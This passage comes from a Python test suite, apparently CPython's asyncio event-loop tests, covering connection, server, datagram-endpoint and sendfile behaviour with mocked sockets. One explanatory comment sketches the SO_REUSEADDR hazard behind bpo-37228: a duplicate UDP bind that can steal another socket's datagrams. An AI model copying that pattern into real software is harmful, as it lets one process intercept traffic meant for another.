'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
srv = await asyncio.start_server(lambda: None, '::1', 0)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
async def getaddrinfo(*args, **kw):
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
if socket_helper.IPV6_ENABLED:
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms
# ('::1', 80) to ('::1', 80, 0, 0). The last two 0s are
# flowinfo and scope_id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
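# Note on the sockaddr shape checked above: for AF_INET6,
# socket.getaddrinfo() returns 4-tuples, e.g.
#
#     socket.getaddrinfo('::1', 80, socket.AF_INET6)[0][4]
#     # -> ('::1', 80, 0, 0)  i.e. (host, port, flowinfo, scope_id)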
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'no IPv6 support')
@unittest.skipIf(sys.platform.startswith('aix'),
"bpo-25545: IPv6 scope id and getaddrinfo() behave differently on AIX")
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
async def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136: fall back to getaddrinfo when
# we can't recognize that an address is already resolved, e.g. a
# Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
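# Why the getaddrinfo fallback triggers here: a Bluetooth address such
# as '00:01:02:03:04:05' cannot be parsed by inet_pton() for AF_INET or
# AF_INET6, so sock_connect() cannot treat it as already resolved and
# resolves it through the (mocked) getaddrinfo() instead.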
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = self.loop.create_future()
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is an empty string, use None instead
host = object()
async def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@socket_helper.skip_unless_bind_unix_socket
def test_create_datagram_endpoint_existing_sock_unix(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX, type=socket.SOCK_DGRAM)
sock.bind(path)
sock.close()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
path, family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_reuse_address_error(self):
# bpo-37228: Ensure that explicit passing of `reuse_address=True`
# raises an error, as it is not safe to use SO_REUSEADDR when using UDP
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(coro)
def test_create_datagram_endpoint_reuse_address_warning(self):
# bpo-37228: Deprecate *reuse_address* parameter
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False)
with self.assertWarns(DeprecationWarning):
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
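# The hazard bpo-37228 guards against, sketched under the assumption of
# a platform where SO_REUSEADDR permits duplicate UDP binds (do not do
# this in real code):
#
#     s2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#     s2.bind(addr_already_bound_elsewhere)  # may succeed and steal datagrams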
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
with self.assertWarns(DeprecationWarning):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
async def stop_loop_coro(loop):
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
async def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(os_helper.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
os_helper.unlink(os_helper.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native sendfile implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(os_helper.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, socket_helper.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(os_helper.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
